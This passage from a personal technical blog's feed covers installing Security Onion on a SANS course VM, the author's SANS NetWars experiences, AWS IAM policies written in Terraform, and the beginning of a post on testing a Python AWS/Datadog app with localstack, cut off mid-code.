&lt;a href="https://securityonion.net/" target="_blank" rel="noopener">The Security Onion&lt;/a>! Turns out that it also uses docker to run the ELK stack behind the scenes. In addition, it includes some tools such as &lt;strong>Zeek/Bro&lt;/strong>, &lt;strong>Suricata/Snort&lt;/strong> right out of the box, that we also covered in the course. So cool!&lt;/p>
&lt;p>Setting it all up on the #SEC530 VM was a bit more lengthy than my previous setup. First I had to add some additional juice to the underlying VM (4 CPUs and min 8GB of RAM) which then I followed up with the below installation steps on a fresh clone of the #SEC530 VM:&lt;/p>
&lt;ul>
&lt;li>
&lt;p>Set the VM NIC mode to bridge (Autodetect) (in VMWare Fusion)&lt;/p>
&lt;/li>
&lt;li>
&lt;p>Boot the VM, log in and change the settings in &lt;strong>Software &amp;amp; Updates&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>on &lt;strong>Ubuntu Software&lt;/strong> tab check all options except &lt;strong>restricted software&lt;/strong>&lt;/li>
&lt;li>on &lt;strong>Updates&lt;/strong> tab select the first two options&lt;/li>
&lt;li>click &lt;strong>Close&lt;/strong> and then click &lt;strong>Reload&lt;/strong> to latest updates&lt;/li>
&lt;/ul>
&lt;/li>
&lt;li>
&lt;p>Next run these steps in the Terminal (adopted from
&lt;a href="https://securityonion.readthedocs.io/en/latest/installing-on-ubuntu.html" target="_blank" rel="noopener">here&lt;/a>):&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;debconf debconf/frontend select noninteractive&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> sudo debconf-set-selections
sudo rm -rf /var/lib/apt/lists/*
sudo apt-get update
sudo apt-get -y install software-properties-common
sudo add-apt-repository -y ppa:securityonion/stable
sudo apt-get update
sudo apt-get -y -f -o Dpkg::Options::&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;--force-overwrite&amp;#34;&lt;/span> install securityonion-all securityonion-onionsalt securityonion-suricata syslog-ng-core
&lt;/code>&lt;/pre>&lt;/div>&lt;/li>
&lt;/ul>
&lt;p>The above steps install necessary dependencies and then create a desktop shortcut called &lt;strong>Setup&lt;/strong> with the Security Onion icon. Double-click it to continue the install process (alternatively issue &lt;code>sudo sosetup&lt;/code> in Terminal):&lt;/p>
&lt;ul>
&lt;li>chose to reconfigure the network interfaces (with DHCP)&lt;/li>
&lt;li>accept the necessary reboot now&lt;/li>
&lt;li>trigger the Setup process again to finish the installation&lt;/li>
&lt;li>chose &lt;strong>Evaluation Mode&lt;/strong> when it asks this question&lt;/li>
&lt;li>set up default username/password used to secure the various dashboards&lt;/li>
&lt;/ul>
&lt;p>Once the setup finishes, it takes a few minutes, it will show several additional popup windows with useful information about the Security Onion&amp;rsquo;s functions, while also several new desktop icons will appear:&lt;/p>
&lt;p>&lt;img src="setup-done.png" alt="install-onion">&lt;/p>
&lt;p>At this point, the setup is complete and you can see the installed services by clicking on the new icons on the Desktop. Most interesting to me was the &lt;strong>Kibana dashboard&lt;/strong> which comes pre-loaded with some amazing features out of the box:&lt;/p>
&lt;p>&lt;img src="kibana-onion.png" alt="kibana-onion">&lt;/p>
&lt;p>This really seems like an awesome set of features that can detect malicious attacks much better than my first setup with &lt;strong>ELK &amp;amp; Packetbeat&lt;/strong>. This is exactly what I was looking for, when I was on that shared WLAN, some advanced visibility into network metadata. I&amp;rsquo;m glad I did not have to implement it by hand after all &amp;hellip; :)&lt;/p>
&lt;h3 id="blue-team-project---next-next-level">Blue Team Project - Next Next Level&lt;/h3>
&lt;p>While looking around on the net for possible solutions to my issues, I stumbled upon this project from
&lt;a href="https://github.com/dtag-dev-sec/tpotce/tree/master/docker" target="_blank" rel="noopener">Telekom Security&lt;/a>&amp;lsquo;s GitHub page, which seemed like an even more advanced version of the Security Onion with various types of built-in honeypots that feed information to a Kibana dashboard. Sadly however, this is not possible to set up on the #SEC530 VM because the built-in installer does not support Xubuntu 16.04 and there were so many moving parts to the project that I did not dare to do it all by hand. For now I just keep it here as a reference, maybe in a future post I will describe it in more detail!&lt;/p>
&lt;h2 id="conclusion">Conclusion&lt;/h2>
&lt;p>As I already mentioned, this was my first SANS training and I could not be happier about the whole experience, despite the unfortunate situation with the global pandemic disrupting our onsite course. While I was initially a bit worried about the lack of &lt;code>station isolation&lt;/code> on the shared WLAN, I really enjoyed digging around the Internet for a solution to earn my some peace of mind. The knowledge and new skills I acquired in the domain of Defensible Security Architecture have been quite overwhelming to say the least.&lt;/p>
&lt;p>I also enjoyed building new connections with the people who run these trainings and with my fellow SANS alumni. Taking part in the NetWars events that followed in March and April, I felt good to be part of such an incredible community.&lt;/p></description></item><item><title>SANS NetWars in March</title><link>https://flrnks.netlify.app/post/sans-netwars/</link><pubDate>Sat, 04 Apr 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/sans-netwars/</guid><description>&lt;p>This past month of March was quite eventful, to say the least, with all the news of this pandemic shaking many different segments of our globalised society. It&amp;rsquo;s virtually impossible to escape the constant flow of news in the media. While March was practically defined by the continuously evolving story of the virus, I wanted to write a new blog post about a different topic that also greatly impacted this month for me: a live SANS course I took attended in Prague and some online CTF challenges organised by SANS and the Counter Hack team.&lt;/p>
&lt;h2 id="sans-prague-march-2020">SANS Prague March 2020&lt;/h2>
&lt;p>I still remember how excited I was when I learnt that my employer will sponsor my attendance a 6 days long
&lt;a href="https://www.sans.org/event/prague-march-2020" target="_blank" rel="noopener">SANS&lt;/a> course in March, taking place in the city where I live and work currently. I was eagerly looking forward to it, taking place between 9th and 14th of March.&lt;/p>
&lt;p>&lt;img src="sans_prague.jpg" alt="SANS-Prague">&lt;/p>
&lt;p>The course was arranged in a very nice hotel in Prague 5 district, and we were hosted by a very friendly SANS staff that included some world-class teachers. I really liked how well they organised everything and tried to spoil us with good food. There were actually several courses running in parallel, my course, the
&lt;a href="https://www.sans.org/course/defensible-security-architecture-and-engineering" target="_blank" rel="noopener">SEC530&lt;/a>, a.k.a &lt;strong>Defensible Security Architecture and Engineering&lt;/strong>, was taught by Ryan Nicholson, who did a great job during the first 3 days.&lt;/p>
&lt;p>Sadly however, on Wednesday (11th of March) we were instructed to go home due to the growing risk of contacting the COVID-19 virus. All was not lost, because the SANS team did their best to convert the whole class to an online CyberCast while the course was in progress. So from the next day onward, we continued remotely with new instructors, who jumped in, while Ryan was on his way back to the States. Initially we thought he would continue hosting the CyberCast from his hotel room, but eventually we got to know two new SANS instructors, Greg Scheidel and Ismael Valenzuela, who took turns teaching the rest of the course material and then hosting the NetWars event for us.&lt;/p>
&lt;h2 id="sans-netwars">SANS NetWars&lt;/h2>
&lt;p>While the raw educational content of Sec530 was great, I most enjoyed the last day of the course when we got to take part in a private NetWars challenge hosted just for the participants of the course, which was about 10-15 people. I had some initial ideas about what NetWars was all about, thanks to numerous cleverly placed banners in Holiday Hack Challenges from previous years, I never actually got to participate in one before so it was a completely new experience for me. And I was immediately loving it so much, that when it was over I knew I wanted more!&lt;/p>
&lt;!-- ![SEC530-Coin](https://pbs.twimg.com/media/D9g4yNrWwAE8H8h?format=jpg&amp;name=4096x4096) -->
&lt;p>So you can imagine how excited I was when I learnt that SANS was going to offer a bunch of
&lt;a href="https://www.sans.org/blog/and-now-for-something-awesome-sans-launches-new-series-of-worldwide-capture-the-flag-cyber-events/" target="_blank" rel="noopener">free NetWars events&lt;/a> for SANS alumni, with some special events open to the whole world to take part in! First one was a two-day Core NetWars Tournament, first of its kind, organised completely online via CyberCast from 19th to 20th of March. Due to timezone differences, it lasted until 2 am on both days, but I loved every second of it! While I had no high hopes of winning, I was surprised how well I did, eventually finishing as 12th amongst the first time NetWars players.&lt;/p>
&lt;!-- ![Core-NetWars](core-netwars.jpg) -->
&lt;p>Next up was the Mini NetWars Mission 1, also first of its kind, from 2nd till 3rd of April. This was a bit different from Core NetWars, as we did not have to solve the challenges in a virtualised OS environment, instead we relied solely on the browser, very similar to how the Holiday Hack environment works, which was already quite familiar to me!&lt;/p>
&lt;p>This time many more people signed up, as registration was not limited to just SANS alumni but open to the public. Eventually we were more than 500 people competing! This time I managed to solve all of the objectives and obtained the maximum score of 92 which qualified me as a
&lt;a href="https://www.counterhackchallenges.com/winners" target="_blank" rel="noopener">winner&lt;/a>. My final placement on the ranking was somewhere around 50th, as I took a number of hints and was a bit slower than others. Nevertheless, I was still amazed by how far I have come. By the way, this is my battle station setup, which won me some cool SANS swag on
&lt;a href="https://twitter.com/SANSInstitute/status/1246150677602226176" target="_blank" rel="noopener">Twitter&lt;/a> :)&lt;/p>
&lt;p>&lt;img src="mini-netwars.jpg" alt="Mini-NetWars">&lt;/p>
&lt;h2 id="conclusion">CONCLUSION&lt;/h2>
&lt;p>All in all, I cannot thanks SANS enough for hosting these alumni NetWars events, some completely free for the whole cyber security community. I am probably not alone in feeling that they did an amazing service to us all, who are probably stuck at home due to social distancing and quarantine measures implemented world wide. This month for me was surely made a bit special, so big thanks to SANS and the Counter Hack team for all that their efforts!&lt;/p>
&lt;p>&lt;strong>P.S.:&lt;/strong>: A very very very cool Spotify Playlist, which works wonders during such CTF contests, is available via this
&lt;a href="https://open.spotify.com/playlist/2KwHJlC1x117sXWR0CKZWW?si=H3V76HhzSwi_Bu5Wqut7qQ" target="_blank" rel="noopener">link&lt;/a>. I cannot take credit for it, it belongs to Bryce Galbraith who moderated these two previous NetWars events and was kind enough to share his playlist with us.&lt;/p></description></item><item><title>Identity &amp; Access Management</title><link>https://flrnks.netlify.app/post/aws-iam/</link><pubDate>Mon, 03 Feb 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/aws-iam/</guid><description>&lt;h2 id="introduction">INTRODUCTION&lt;/h2>
&lt;p>In this post I show how the Identity and Access Management service in the AWS Public Cloud works to secure resources and workloads. It is a very important topic, because it underpins all of the security that is needed for hosting one&amp;rsquo;s resources in the public cloud.&lt;/p>
&lt;p>At the end of the day, the cloud is just a concept that offers a convenient illusion of dedicated resources, but in reality it&amp;rsquo;s just some process that runs on someone else&amp;rsquo;s hardware, so one has to be absolutely sure about security before trusting it and running their business-critical workloads on it.&lt;/p>
&lt;p>It is enough to do a quick google search for
&lt;a href="https://www.google.com/search?q=unsecured%20s3%20bucket" target="_blank" rel="noopener">unsecured s3 bucket&lt;/a> to see plenty of examples of administrators failing to properly harden and configure their AWS resources, and falling victim to accidental disclosure of often business-critical information.&lt;/p>
&lt;p>
&lt;a href="https://docs.aws.amazon.com/iam/?id=docs_gateway" target="_blank" rel="noopener">IAM&lt;/a> exists in the realm of AWS Cloud as a standalone service, providing various ways in which access to resources and workloads can be restricted. For example, if someone has an S3 bucket for storing arbitrary data, one can use IAM policies to restrict access to data stored in the bucket based on various criteria such as user identity, connection source IP, VPC environment and so on. S3 is a convenient service to demonstrate IAM capabilities, because it is very easy to grasp the result of restrictions: access to files in an S3 bucket is either granted or denied.&lt;/p>
&lt;h2 id="how-it-works">HOW IT WORKS&lt;/h2>
&lt;p>In order to illustrate how IAM works, I decided to create a Python Lambda function, which is just an AWS service offering server-less functions, and implemented a routine that tries to access some data stored in a particular S3 bucket. By default the Lambda starts running with an
&lt;a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html" target="_blank" rel="noopener">IAM role&lt;/a> that has only read-only permission to the bucket. This is verified by making an API call with the
&lt;a href="https://boto3.amazonaws.com/v1/documentation/api/latest/index.html" target="_blank" rel="noopener">boto3&lt;/a> package, which returns without any error. Next the Lambda tries to write some new data to the bucket, but this fails because the IAM role is not equipped with Write permission to the S3 bucket.&lt;/p>
&lt;p>To mitigate this problem, I use boto3 to make an AWS Secure Token Service (
&lt;a href="https://docs.aws.amazon.com/STS/latest/APIReference/Welcome.html" target="_blank" rel="noopener">STS&lt;/a>) call and assume a new role which is equipped with the necessary read-write access. Using this new role the program demonstrates that it can write to the bucket as expected. Below is a sample output of the Lambda Function in action:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yml" data-lang="yml">===&lt;span class="w"> &lt;/span>Checking&lt;span class="w"> &lt;/span>IAM&lt;span class="w"> &lt;/span>Identity&lt;span class="w"> &lt;/span>===&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">ARN&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>arn&lt;span class="p">:&lt;/span>aws&lt;span class="p">:&lt;/span>sts&lt;span class="p">::&lt;/span>ACCOUNT_ID&lt;span class="p">:&lt;/span>assumed-role/Base-Lambda-Custom-Role/lambda&lt;span class="w">
&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>===&lt;span class="w"> &lt;/span>Testing&lt;span class="w"> &lt;/span>Read&lt;span class="w"> &lt;/span>access&lt;span class="w"> &lt;/span>to&lt;span class="w"> &lt;/span>S3&lt;span class="w"> &lt;/span>file&lt;span class="w"> &lt;/span>in&lt;span class="w"> &lt;/span>bucket&lt;span class="w"> &lt;/span>===&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>{&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">&amp;#34;field1&amp;#34;: &lt;/span>&lt;span class="kc">true&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">&amp;#34;field2&amp;#34;: &lt;/span>&lt;span class="m">1.&lt;/span>4107917E7&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>}&lt;span class="w">
&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>===&lt;span class="w"> &lt;/span>Testing&lt;span class="w"> &lt;/span>Write&lt;span class="w"> &lt;/span>access&lt;span class="w"> &lt;/span>to&lt;span class="w"> &lt;/span>S3&lt;span class="w"> &lt;/span>bucket&lt;span class="w"> &lt;/span>===&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">Error&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>AccessDenied!&lt;span class="w">
&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>===&lt;span class="w"> &lt;/span>Assumed&lt;span class="w"> &lt;/span>New&lt;span class="w"> &lt;/span>IAM&lt;span class="w"> &lt;/span>Identity&lt;span class="w"> &lt;/span>===&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">ARN&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>arn&lt;span class="p">:&lt;/span>aws&lt;span class="p">:&lt;/span>sts&lt;span class="p">::&lt;/span>ACCOUNT_ID&lt;span class="p">:&lt;/span>assumed-role/S3-RW-Role/lambda&lt;span class="w">
&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>===&lt;span class="w"> &lt;/span>Testing&lt;span class="w"> &lt;/span>Write&lt;span class="w"> &lt;/span>access&lt;span class="w"> &lt;/span>to&lt;span class="w"> &lt;/span>S3&lt;span class="w"> &lt;/span>bucket&lt;span class="w"> &lt;/span>(using&lt;span class="w"> &lt;/span>new&lt;span class="w"> &lt;/span>role)&lt;span class="w"> &lt;/span>===&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>...&lt;span class="w"> &lt;/span>file&lt;span class="w"> &lt;/span>was&lt;span class="w"> &lt;/span>written&lt;span class="w"> &lt;/span>successfully!&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>To get a better understanding how this all worked in code, feel free to check out the source code repository in Github (
&lt;a href="https://github.com/florianakos/aws-iam-exercise" target="_blank" rel="noopener">link&lt;/a>). Because I am a big fan of Terraform, I defined all resources (S3, IAM, Lambda) in code which makes it very simple and straightforward to deploy and test the code if you feel like!&lt;/p>
&lt;h2 id="advanced-iam">ADVANCED IAM&lt;/h2>
&lt;p>Besides providing the basic functionality to restrict access to resources base on user identity, there are some cool and more advanced features of AWS IAM that I wanted to touch upon. For example, to show how simple it is to give read-only permissions to a bucket for an IAM role:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">data &lt;span class="s2">&amp;#34;aws_iam_policy_document&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_ro_access_policy_document&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
statement &lt;span class="o">{&lt;/span>
&lt;span class="nv">effect&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Allow&amp;#34;&lt;/span>
&lt;span class="nv">actions&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span>
&lt;span class="s2">&amp;#34;s3:GetObject&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;s3:ListBucket&amp;#34;&lt;/span>,
&lt;span class="o">]&lt;/span>
&lt;span class="nv">resources&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span>
&lt;span class="s2">&amp;#34;arn:aws:s3:::my-bucket&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;arn:aws:s3:::my-bucket/*&amp;#34;&lt;/span>
&lt;span class="o">]&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
resource &lt;span class="s2">&amp;#34;aws_iam_policy&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_ro_access_policy&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="nv">name&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;S3-ReadOnly-Access&amp;#34;&lt;/span>
&lt;span class="nv">policy&lt;/span> &lt;span class="o">=&lt;/span> data.aws_iam_policy_document.s3_ro_access_policy_document.json
&lt;span class="o">}&lt;/span>
resource &lt;span class="s2">&amp;#34;aws_iam_role_policy_attachment&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;Allow_S3_ReadOnly_Access&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="nv">role&lt;/span> &lt;span class="o">=&lt;/span> aws_iam_role.aws_custom_role_for_lambda.name
&lt;span class="nv">policy_arn&lt;/span> &lt;span class="o">=&lt;/span> aws_iam_policy.s3_ro_access_policy.arn
&lt;span class="o">}&lt;/span>
resource &lt;span class="s2">&amp;#34;aws_iam_role&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;aws_s3_readwrite_role&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="nv">name&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;S3-RW-Role&amp;#34;&lt;/span>
&lt;span class="nv">description&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Role to allow full RW to bucket&amp;#34;&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Full source code on
&lt;a href="https://github.com/florianakos/aws-iam-exercise/blob/master/terraform/s3.tf" target="_blank" rel="noopener">GitHub&lt;/a>.&lt;/p>
&lt;p>With this short Terraform code, I created a role, and assigned an IAM policy to it, which has RO access to &lt;code>my-bucket&lt;/code> resource in S3. To spice this up a bit, it is possible to add extra restrictions based on various elements of the request context to restrict access based on Source IP for example:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">data &lt;span class="s2">&amp;#34;aws_iam_policy_document&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_ro_access_policy_document&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
statement &lt;span class="o">{&lt;/span>
&lt;span class="nv">effect&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Deny&amp;#34;&lt;/span>
&lt;span class="nv">actions&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span>
&lt;span class="s2">&amp;#34;s3:*&amp;#34;&lt;/span>
&lt;span class="o">]&lt;/span>
&lt;span class="nv">resources&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;*&amp;#34;&lt;/span>&lt;span class="o">]&lt;/span>
condition &lt;span class="o">{&lt;/span>
&lt;span class="nb">test&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;IpAddress&amp;#34;&lt;/span>
&lt;span class="nv">variable&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;aws:SourceIp&amp;#34;&lt;/span>
&lt;span class="nv">values&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;192.168.2.0/24&amp;#34;&lt;/span> &lt;span class="o">]&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>All of a sudden, even if the user who makes the request to S3 has correct credentials, but is connecting from a subnet which is outside the one specified above, the request will be &lt;strong>denied&lt;/strong>! This can be very useful for example, when trying restricting access to resources to be possible only from within a corporate network with specific CIDR range.&lt;/p>
&lt;p>One small issue with this source IP restriction is that it can cause issues for certain AWS services that run on behalf of a principal/user. When using the AWS Athena service for example, triggering a query on data stored in S3 means Athena will make S3 API requests on behalf of the user who initiated the Athena query, but will have a source IP address from some Amazon AWS CIDR range and the request will fail. For this purpose, there is an extra condition that can be added to remediate this issue:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">data &lt;span class="s2">&amp;#34;aws_iam_policy_document&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_ro_access_policy_document&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
statement &lt;span class="o">{&lt;/span>
&lt;span class="nv">effect&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Deny&amp;#34;&lt;/span>
&lt;span class="nv">actions&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span>
&lt;span class="s2">&amp;#34;s3:*&amp;#34;&lt;/span>
&lt;span class="o">]&lt;/span>
&lt;span class="nv">resources&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;*&amp;#34;&lt;/span>&lt;span class="o">]&lt;/span>
condition &lt;span class="o">{&lt;/span>
&lt;span class="nb">test&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;IpAddress&amp;#34;&lt;/span>
&lt;span class="nv">variable&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;aws:SourceIp&amp;#34;&lt;/span>
&lt;span class="nv">values&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;192.168.2.0/24&amp;#34;&lt;/span> &lt;span class="o">]&lt;/span>
&lt;span class="o">}&lt;/span>
condition &lt;span class="o">{&lt;/span>
&lt;span class="nb">test&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Bool&amp;#34;&lt;/span>
&lt;span class="nv">variable&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;aws:ViaAWSService&amp;#34;&lt;/span>
&lt;span class="nv">values&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;false&amp;#34;&lt;/span> &lt;span class="o">]&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The &lt;code>aws:viaAWSService = false&lt;/code> condition will ensure that this Deny will only take effect when the request context does not come from an AWS Service Endpoint. For additional info on what other possibilities exist that can be used to grant or deny access, please consult the AWS
&lt;a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html" target="_blank" rel="noopener">documentation&lt;/a>.&lt;/p>
&lt;h2 id="conclusion">CONCLUSION&lt;/h2>
&lt;p>In this post I demonstrated how to use the boto3 python package to make AWS IAM and STS calls to access resources in the AWS cloud protected by IAM policies. I also discussed some advanced features of AWS IAM that can help you implement more granular IAM policies and access rights. The linked repository also contains an example which may be run locally and does not need the Lambda function to be created (it still, however, requires the Terraform resources to be deployed).&lt;/p></description></item><item><title>Cloud Service Testing</title><link>https://flrnks.netlify.app/post/python-aws-datadog-testing/</link><pubDate>Fri, 17 Jan 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/python-aws-datadog-testing/</guid><description>&lt;p>In this blog post I discuss a recent project I worked on to practice my skills related to AWS, Python and Datadog. It includes topics such as integration testing using &lt;strong>pytest&lt;/strong> and &lt;strong>localstack&lt;/strong>; running Continuous Integration via &lt;strong>Travis-CI&lt;/strong> and infrastructure as code using &lt;strong>Terraform&lt;/strong>.&lt;/p>
&lt;h2 id="intro">Intro&lt;/h2>
&lt;p>For the sake of this blog post, let&amp;rsquo;s assume that a periodic job runs somewhere in the Cloud, outside the context of this application, which generates a file with some meta-data about the job itself. This data includes mostly numerical values, such as the number of images used to train an ML model, or the number of files processed, etc. This part is depicted on the below diagram as a dummy Lambda function that periodically uploads this metadata file to an S3 bucket with random numerical values.&lt;/p>
&lt;p>&lt;img src="img/arch.png" alt="Architecture">&lt;/p>
&lt;p>When this file is uploaded, an event notification is sent to the message queue. The goal of the Python application is to periodically drain these messages from the queue. When the application runs, it fetches the S3 file referenced in each SQS message, parses the file&amp;rsquo;s contents and submits the numerical metrics to DataDog for the purpose of visualisation and alerting.&lt;/p>
&lt;h2 id="testing">Testing&lt;/h2>
&lt;p>Since the application interacts with two different APIs (AWS &amp;amp; Datadog), I figured it was a good idea to create integration tests that can be run easily via some free CI service (e.g.: Travis-CI.org). When writing the integration tests, I opted to create a simple mock class for testing the interaction with the Datadog API, and chose to rely on &lt;strong>localstack&lt;/strong> for testing the interaction with the AWS API.&lt;/p>
&lt;p>Thanks to &lt;strong>localstack&lt;/strong> I could skip creating real resources in AWS and instead use free fake resources in a docker container, that mimic the real AWS API close to 100%. The AWS SDK called &lt;code>boto3&lt;/code> is very easy to reconfigure to connect to the fake resources in &lt;strong>localstack&lt;/strong> with the &lt;code>endpoint_url=&lt;/code> parameter.&lt;/p>
&lt;p>In the following sections I go through different phases of the project:&lt;/p>
&lt;ol>
&lt;li>coding the python app&lt;/li>
&lt;li>mocking Datadog statsd client&lt;/li>
&lt;li>setting up AWS resources in localstack&lt;/li>
&lt;li>creating integration tests&lt;/li>
&lt;li>Travis-CI integration&lt;/li>
&lt;li>running the datadog-agent locally&lt;/li>
&lt;li>setting up real AWS resources&lt;/li>
&lt;li>live testing&lt;/li>
&lt;/ol>
&lt;h3 id="-coding-the-python-app-">~ Coding the python app ~&lt;/h3>
&lt;p>The
&lt;a href="https://github.com/florianakos/python-testing/blob/master/app/submitter.py" target="_blank" rel="noopener">code&lt;/a> is mainly composed of two Python classes with methods to interact with AWS and DataDog. The &lt;strong>CloudResourceHandler&lt;/strong> class has methods to interact with S3 and SQS, which can be replaced in integration-tests with preconfigured &lt;code>boto3&lt;/code> clients for &lt;strong>localstack&lt;/strong>.&lt;/p>
&lt;p>The &lt;strong>MetricSubmitter&lt;/strong> class uses the &lt;strong>CloudResourceHandler&lt;/strong> internally and offers some additional methods for sending metrics to DataDog. Internally it uses statsd from the &lt;code>datadog&lt;/code> python
&lt;a href="https://pypi.org/project/datadog/" target="_blank" rel="noopener">package&lt;/a>, which can be replaced via dependency injection in integration tests with a mock statsd class that I created to test its interaction with the Datadog API.&lt;/p>
&lt;p>To connect to the real AWS &amp;amp; Datadog APIs (via a preconfigured local datadog-agent) there needs to be two environment variables specified at run-time:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>STATSD_HOST&lt;/strong> set to &lt;code>localhost&lt;/code>&lt;/li>
&lt;li>&lt;strong>SQS_QUEUE_URL&lt;/strong> set to the URL of the Queue&lt;/li>
&lt;/ul>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="n">os&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">environ&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;STATSD_HOST&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;localhost&amp;#39;&lt;/span>
&lt;span class="n">os&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">environ&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;SQS_QUEUE_URL&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;https://sqs.eu-central-1.amazonaws.com/????????????/cloud-job-results-queue&amp;#39;&lt;/span>
&lt;span class="n">session&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">boto3&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">Session&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">profile_name&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;profile-name&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="n">MetricSubmitter&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">statsd&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">datadog_statsd&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="n">sqs_client&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">session&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">client&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;sqs&amp;#39;&lt;/span>&lt;span class="p">),&lt;/span>
